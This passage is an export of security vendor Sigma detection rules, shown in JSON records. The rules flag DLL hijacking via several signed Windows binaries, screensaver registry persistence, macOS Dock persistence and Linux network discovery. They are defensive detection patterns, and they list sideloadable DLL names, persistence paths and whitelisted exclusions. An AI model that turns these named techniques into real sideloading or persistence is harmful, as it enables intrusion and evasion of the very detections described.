"content": "title: DLL Hijacking via snippingtool.exe\nid: bd421807-c4fb-499a-8693-4f2cabebf246\ndescription: |\n Detects potential Windows DLL Hijacking via snippingtool.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'snippingtool.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\dwmapi.dll'\n - '\\msdrm.dll'\n - '\\oleacc.dll'\n - '\\uxtheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd421807-c4fb-499a-8693-4f2cabebf246",
"rule_name": "DLL Hijacking via snippingtool.exe",
"rule_description": "Detects potential Windows DLL Hijacking via snippingtool.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd48810c-d072-43af-ba2d-ae8b2fda0912",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620531Z",
"creation_date": "2026-03-23T11:45:34.620533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620537Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1546/002/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1546_002_registry_screensaver_modification.yml",
"content": "title: Screensaver Path Changed in Registry\nid: bd48810c-d072-43af-ba2d-ae8b2fda0912\ndescription: |\n Detects a modification of the screensaver key in the registry.\n Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.\n It is recommended to investigate the process that modified the registry value and to verify the legitimacy of the .scr file added as the new screensaver.\nreferences:\n - https://attack.mitre.org/techniques/T1546/002/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2022/11/14\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.002\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|endswith: '\\Control Panel\\Desktop\\SCRNSAVE.exe'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n - '-'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessParentSigned: 'true'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_schedule:\n ProcessGrandparentCommandLine|endswith:\n - '\\svchost.exe -k netsvcs -p -s Schedule' # windows 10 Version 1703 and above\n - '\\svchost.exe -k netsvcs -p' # windows versions 10 before 1703\n - '\\taskeng.exe' # on older windows versions\n\n exclusion_ccmexec:\n ProcessOriginalFileName: 'CcmExec.exe'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_mtxproxy:\n - ProcessGrandparentImage|endswith: 'mtxproxy.exe'\n - ProcessParentImage|endswith: 'mtxproxy.exe'\n\n exclusion_maincare:\n - ProcessCompany: 'Maincare Solutions'\n - Details:\n - '?:\\Windows\\TEMP\\CWSSO\\SCREEN~1.SCR'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\CWSSO\\SCREEN~1.SCR'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\CWSSO\\SCREEN~1.SCR'\n\n exclusion_bmc:\n ProcessCurrentDirectory: '?:\\Program Files\\BMC Software\\Client Management\\Client\\bin'\n ProcessCommandLine: 'REG ADD HKCU\\Control Panel\\Desktop /v SCRNSAVE.EXE /t REG_SZ /d ?:\\windows\\system32\\PhotoScreensaver.scr /f'\n Details: '?:\\windows\\system32\\PhotoScreensaver.scr'\n\n # this is the default screensaver\n exclusion_scrnsave:\n Details:\n - 'scrnsave.scr'\n - '?:\\windows\\system32\\scrnsave.scr'\n - '%windir%\\system32\\scrnsave.scr'\n\n exclusion_ribbons:\n Details:\n - 'Ribbons.scr'\n - '?:\\Windows\\system32\\Ribbons.scr'\n - '%windir%\\system32\\Ribbons.scr'\n\n exclusion_shell32:\n ProcessCommandLine: '?:\\Windows\\System32\\rundll32.exe shell32.dll,Control_RunDLL desk.cpl,ScreenSaver,@ScreenSaver'\n\n exclusion_migration1:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessParentImage|endswith:\n - '\\SetupHost.exe'\n - '\\SetupPlatform.exe'\n exclusion_migration2:\n ProcessAncestors|contains: '|?:\\Windows\\CCM\\OSDUpgradeOS.exe|?:\\Windows\\CCM\\TSManager.exe|'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n #ProcessParentImage: '?:\\Windows\\SoftwareDistribution\\\\*\\WindowsUpdateBox.exe'\n #ProcessGrandparentImage: '?:\\Windows\\System32\\wuauclt.exe'\n\n exclusion_asus:\n ProcessOriginalFileName: 'AsusOptimizationStartupTask.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ASUSTeK COMPUTER INC.'\n\n exclusion_mighost:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n Details: '?:\\windows\\system32\\PhotoScreensaver.scr'\n\n exclusion_bubbles:\n Details: '?:\\windows\\system32\\Bubbles.scr'\n\n exclusion_netplay:\n ProcessImage:\n - '?:\\Program Files (x86)\\Netpresenter\\NetPlay.exe'\n - '?:\\Program Files\\Netpresenter\\NetPlay.exe'\n - '?:\\Program Files (x86)\\Netpresenter\\NpAgent.exe'\n - '?:\\Program Files\\Netpresenter\\NpAgent.exe'\n Details: '?:\\Windows\\NETPRE~1.SCR'\n\n exclusion_mindray:\n ProcessImage:\n - '?:\\Program Files (x86)\\Mindray CMS\\CmsDaemon\\CMSStation.exe'\n - '?:\\Program Files\\Mindray CMS\\CmsDaemon\\CMSStation.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_citrix:\n ProcessImage: '?:\\Program Files\\Citrix\\User Profile Manager\\UserProfileManager.exe'\n\n exclusion_mcafee:\n # McAfee DLP Endpoint Service\n ProcessOriginalFileName: 'fcags.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_configsecuritypolicy:\n ProcessOriginalFileName: 'ConfigSecurityPolicy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_clmlive:\n ProcessGrandparentImage: '?:\\AVI\\CLMLIVE\\ClmLive.exe'\n ProcessParentImage: '?:\\AVI\\CLMLIVE\\jre?_64\\bin\\javaw.exe'\n Details:\n - '?:\\AVI\\Jeep-Java\\Jeep-Java.scr'\n - '?:\\AVI\\JEEP\\jeep.scr'\n\n exclusion_amcorre:\n ProcessOriginalFileName: 'AMCORRE.EXE'\n ProcessLegalCopyright: 'Maincare Solutions France 1999-202?'\n Details: '?:\\WINDOWS\\system32\\PhotoScreensaver.scr'\n\n exclusion_sccm:\n ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessGrandparentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_ivanti:\n ProcessOriginalFileName: 'pfwsmgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Ivanti, Inc.'\n\n exclusion_mediqual:\n ProcessImage: '?:\\Program Files (x86)\\Mediqual7\\M61W7C.exe'\n ProcessOriginalFileName: 'MediFrameWork.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd48810c-d072-43af-ba2d-ae8b2fda0912",
"rule_name": "Screensaver Path Changed in Registry",
"rule_description": "Detects a modification of the screensaver key in the registry.\nAdversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.\nIt is recommended to investigate the process that modified the registry value and to verify the legitimacy of the .scr file added as the new screensaver.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd60d353-8f30-4566-9840-622d4dbb9b5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092779Z",
"creation_date": "2026-03-23T11:45:34.092781Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092786Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group",
"https://attack.mitre.org/techniques/T1647/"
],
"name": "t1647_defaults_plist_modification.yml",
"content": "title: Application Added to Dock via defaults\nid: bd60d353-8f30-4566-9840-622d4dbb9b5f\ndescription: |\n Detects when a program is added to the macOS's Dock using defaults.\n Defaults allows users to read, write, and delete macOS user default values.\n The com.apple.dock.plist file defines the content of the macOS Dock.\n Adversaries may add their malicious program to the com.apple.dock.plist file to make their program show in the computer's Dock and achieve persistence.\n It is recommended to check if the modification is legitimate.\nreferences:\n - https://www.bitdefender.com/en-us/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group\n - https://attack.mitre.org/techniques/T1647/\ndate: 2024/07/08\nmodified: 2025/09/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1647\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.SystemModification\n - classification.macOS.LOLBin.Defaults\n - classification.macOS.Behavior.DefenseEvasion\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/defaults'\n CommandLine|contains|all:\n - 'com.apple.dock'\n - ' write '\n - 'persistent-apps'\n ProcessParentImage|contains: '/'\n\n exclusion_superhuman:\n GrandparentImage: '/Applications/Superhuman.app/Contents/MacOS/Superhuman'\n\n exclusion_roblox:\n ParentCommandLine:\n - '/Volumes/RobloxStudioInstaller/RobloxStudioInstaller.app/Contents/MacOS/RobloxStudioInstaller'\n - '/Volumes/RobloxPlayerInstaller/RobloxPlayerInstaller.app/Contents/MacOS/RobloxPlayerInstaller'\n\n exclusion_intunes:\n Ancestors|contains: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n exclusion_legitimate_apps:\n ProcessCommandLine|contains:\n - '/applications/company portal.app'\n - '/applications/firefox.app'\n - '/applications/microsoft excel.app'\n - '/applications/microsoft outlook.app'\n - '/applications/microsoft powerpoint.app'\n - '/applications/microsoft teams.app'\n - '/applications/microsoft word.app'\n - '/applications/serato dj pro.app'\n - '/system/applications/app store.app'\n - '/system/applications/launchpad.app'\n - '/system/applications/system settings.app'\n - '/system/applications/utilities/terminal.app'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd60d353-8f30-4566-9840-622d4dbb9b5f",
"rule_name": "Application Added to Dock via defaults",
"rule_description": "Detects when a program is added to the macOS's Dock using defaults.\nDefaults allows users to read, write, and delete macOS user default values.\nThe com.apple.dock.plist file defines the content of the macOS Dock.\nAdversaries may add their malicious program to the com.apple.dock.plist file to make their program show in the computer's Dock and achieve persistence.\nIt is recommended to check if the modification is legitimate.\n",
"rule_creation_date": "2024-07-08",
"rule_modified_date": "2025-09-22",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1647"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd717793-fde9-4539-90cd-c62f18ae2c99",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601925Z",
"creation_date": "2026-03-23T11:45:34.601929Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601936Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qwinsta.yml",
"content": "title: DLL Hijacking via qwinsta.exe\nid: bd717793-fde9-4539-90cd-c62f18ae2c99\ndescription: |\n Detects potential Windows DLL Hijacking via qwinsta.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qwinsta.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\UTILDLL.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd717793-fde9-4539-90cd-c62f18ae2c99",
"rule_name": "DLL Hijacking via qwinsta.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qwinsta.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd86d1f6-2ffc-4fe8-96a5-88918b5860a2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588006Z",
"creation_date": "2026-03-23T11:45:34.588010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588102Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_apphostregistrationverifier.yml",
"content": "title: DLL Hijacking via AppHostNameRegistrationVerifier.exe\nid: bd86d1f6-2ffc-4fe8-96a5-88918b5860a2\ndescription: |\n Detects potential Windows DLL Hijacking via AppHostNameRegistrationVerifier.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'AppHostNameRegistrationVerifier.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\npmproxy.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd86d1f6-2ffc-4fe8-96a5-88918b5860a2",
"rule_name": "DLL Hijacking via AppHostNameRegistrationVerifier.exe",
"rule_description": "Detects potential Windows DLL Hijacking via AppHostNameRegistrationVerifier.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bd8f4750-23de-4a90-802a-c2acf1dd3ba0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294839Z",
"creation_date": "2026-03-23T11:45:35.294841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294846Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-tcp_metrics.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_tcp_metrics.yml",
"content": "title: IP TCP Metrics Execution\nid: bd8f4750-23de-4a90-802a-c2acf1dd3ba0\ndescription: |\n Detects the execution of the IP tcp_metrics utility to display the recent cached entries for IPv4 and IPv6 source and destination addresses.\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to analyze the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-tcp_metrics.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Ip\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' tc' # tcp_metrics\n ParentImage|contains: '?'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' delete'\n - ' flush'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "bd8f4750-23de-4a90-802a-c2acf1dd3ba0",
"rule_name": "IP TCP Metrics Execution",
"rule_description": "Detects the execution of the IP tcp_metrics utility to display the recent cached entries for IPv4 and IPv6 source and destination addresses.\nAttackers may use it during discovery phase to discover remote systems.\nIt is recommended to analyze the parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "bdabb0f7-6a9d-4c37-b933-69d36ad31f65",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594988Z",
"creation_date": "2026-03-23T11:45:34.594992Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595000Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bioiso.yml",
"content": "title: DLL Hijacking via bioiso.exe\nid: bdabb0f7-6a9d-4c37-b933-69d36ad31f65\ndescription: |\n Detects potential Windows DLL Hijacking via bioiso.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bioiso.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iumbase.DLL'\n - '\\iumsdk.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n 